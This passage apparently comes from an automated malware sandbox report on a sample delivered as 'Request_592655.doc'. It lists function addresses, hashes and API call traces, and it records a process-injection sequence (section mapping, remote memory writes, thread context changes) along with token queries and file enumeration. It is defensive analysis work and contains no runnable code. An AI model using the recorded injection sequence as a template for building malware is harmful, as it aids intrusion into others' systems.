    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E3C8B, Relevance: 4.6, APIs: 3, Instructions: 53 Total matches: 12
Similarity
  • Total matches: 12
  • API ID: GetModuleFileName$GetLastError
  • String ID:
  • API String ID: 3709004705-0
  • Opcode ID: d4f5095c8902255d58a9495724da3ecc245ace53255d050a18a8176b02be640e
  • Instruction ID: 1c819d795f5758a75cc16c79d532b1e89c3ae16fe89f2260c6209db603419fff
  • Opcode Fuzzy Hash: 22D02B840B9C0AC30C4360859068B1563D10F11185B8879835744B07BF3F1130DFE75D
  • Instruction Fuzzy Hash: 1c819d795f5758a75cc16c79d532b1e89c3ae16fe89f2260c6209db603419fff
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
  • GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
  • GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Function 002E4B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E29FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4A60, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2175, Relevance: 6.1, APIs: 4, Instructions: 107 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E372A, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Process Name: foaqDTP.exe Analysis ID: 60981

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:B6EECE7B4FD1B4BD2626AA07E17DA9DE
Total matches:35
Initial Analysis Report:Open
Initial sample Analysis ID:60981
Initial sample SHA 256:93E3B205BA5588173BA0C1C9E6CDD1BABA4EC461E498986DC9851FAC67FA9346
Initial sample name:Request_592655.doc

Similar Executed Functions

Function 002E432F, Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 209 Total matches: 33filememorytime
Similarity
  • Total matches: 33
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileFindFirstFileGetFileTimeStrChrStrRChrlstrcatmemcpy
  • String ID: pnls$}nls
  • API String ID: 315724681-4252118926
  • Opcode ID: 8b235e28e70d70ecdff0991f1e972a36896af92a2b8f458741844e655a4b3a9d
  • Instruction ID: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d
  • Opcode Fuzzy Hash: 4A21B1031986E3D1C932A943E2C2B921651FF42E67C5C63B144FCB63825F14B58F6B9D
  • Instruction Fuzzy Hash: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d
APIs
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E43CD
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 002E43E1
  • CloseHandle.KERNEL32(?), ref: 002E43F8
  • StrRChrA.SHLWAPI(002E11A6,00000000,0000005C), ref: 002E4404
  • lstrcat.KERNEL32(002E11A6,002E825D), ref: 002E443E
  • FindFirstFileA.KERNELBASE(002E11A6,?), ref: 002E4454
  • FindNextFileA.KERNELBASE(?,?), ref: 002E4486
  • StrChrA.SHLWAPI(?,0000002E), ref: 002E44F4
  • memcpy.NTDLL(00000000,?,00000000), ref: 002E452D
  • FindNextFileA.KERNELBASE(?,?), ref: 002E4542
  • CompareFileTime.KERNEL32(?,?), ref: 002E456B
  • HeapFree.KERNEL32(00000000,00000000,002E8049), ref: 002E45A1
  • HeapFree.KERNEL32(00000000,002E11A6), ref: 002E45B1
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1CB2, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195 Total matches: 38native
Similarity
  • Total matches: 38
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID: pnls
  • API String ID: 82859500-141991303
  • Opcode ID: e910601ac135763dc590ea94eb2919e54113fda6ecca70254a0bfb8fa838b587
  • Instruction ID: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714
  • Opcode Fuzzy Hash: 7421CD4515896286DEA3B4954257FC7D142FF83F88C9CFBB4949A5669B0E00300BEB4F
  • Instruction Fuzzy Hash: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714
APIs
    • Part of subcall function 002E278F: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
    • Part of subcall function 002E278F: memset.NTDLL ref: 002E280F
    • Part of subcall function 002E278F: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
    • Part of subcall function 002E278F: NtClose.NTDLL(?), ref: 002E283F
  • memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
  • memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1B66: GetModuleHandleA.KERNEL32(002E80DB,?,CCCCFEEB,002E1E8C,?,?,?,00000000), ref: 002E1B99
    • Part of subcall function 002E1B66: memcpy.NTDLL(?,3!?w,00000018,002E845C,002E8400,002E8451), ref: 002E1C04
  • memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E39A5: memset.NTDLL ref: 002E39C4
    • Part of subcall function 002E1C13: memcpy.NTDLL(CCCCFEEB,002E7478,00000018,CCCCFEEB,002E845C,CCCCFEEB,002E8400,CCCCFEEB,002E8451,CCCCFEEB,002E1E84,?,002E23F9,?,?,00000000), ref: 002E1CA4
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
  • CloseHandle.KERNEL32(00000000), ref: 002E1EE0
  • memset.NTDLL ref: 002E1EF4
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
    • Part of subcall function 002E284E: memcpy.NTDLL(-00000004,00000004,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28AE
    • Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28C3
    • Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?), ref: 002E2905
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3122, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: e71ad6eecb970af1def45c3799b202ba83529c651fa6d32aa02a68984f086bcb
  • Instruction ID: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
  • Opcode Fuzzy Hash: 7BE0F1411C06C3F798EA64406103F84D7A0FE10A51C9C6B16C1F87E1D00F30305F5A2F
  • Instruction Fuzzy Hash: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
APIs
  • NtOpenProcess.NTDLL(002E618C,00000400,?,002E7494), ref: 002E316A
  • NtOpenProcessToken.NTDLL(002E618C,00000008,00000000), ref: 002E317D
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,002E618C), ref: 002E3198
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,002E618C,002E618C,002E618C), ref: 002E31B5
  • memcpy.NTDLL(00000000,00000000,0000001C), ref: 002E31C2
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
  • NtClose.NTDLL(00000000), ref: 002E31D4
  • NtClose.NTDLL(002E618C), ref: 002E31DD
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
  • Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
  • Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
  • Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
APIs
  • memset.NTDLL ref: 002E38A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
  • memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
  • Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
  • Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
  • Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
APIs
  • NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
  • SetLastError.KERNEL32(00000000), ref: 002E3EA7
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
  • Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
  • Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
  • Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
  • SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
  • Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
  • Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
  • Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
  • SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95threadsynchronization
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
